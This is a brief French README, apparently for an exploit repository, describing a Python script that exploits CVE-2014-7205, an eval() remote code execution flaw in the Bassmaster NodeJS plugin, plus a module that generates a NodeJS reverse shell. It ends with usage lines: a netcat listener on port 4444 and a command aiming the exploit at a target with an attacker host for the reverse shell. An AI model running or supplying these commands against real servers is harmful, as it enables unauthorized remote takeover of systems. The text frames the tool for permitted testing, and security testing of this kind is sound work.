
Plugin Bassmaster NodeJS RCE
bassmaster-rce.py: Un script Python pour exploiter CVE-2014-7205. nodeshell.py: Un module Python pour générer un reverse shell pour NodeJS
!!Utilisez uniquement contre des serveurs sur lesquels vous avez la permission de tester
CVE-2014-7205 est une vulnérabilité d'exécution de code à distance dans le plugin Bassmaster pour NodeJS. Toutes les versions <= 1.5.1 sont concernées. La vulnérabilité existe dans le fichier lib/batch.js dans la fonction internals.batch où un appel à eval() utilise une entrée utilisateur mal échappée (en gros, l'expression régulière ne vérifie pas si les requêtes contiennent du code malveillant).
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444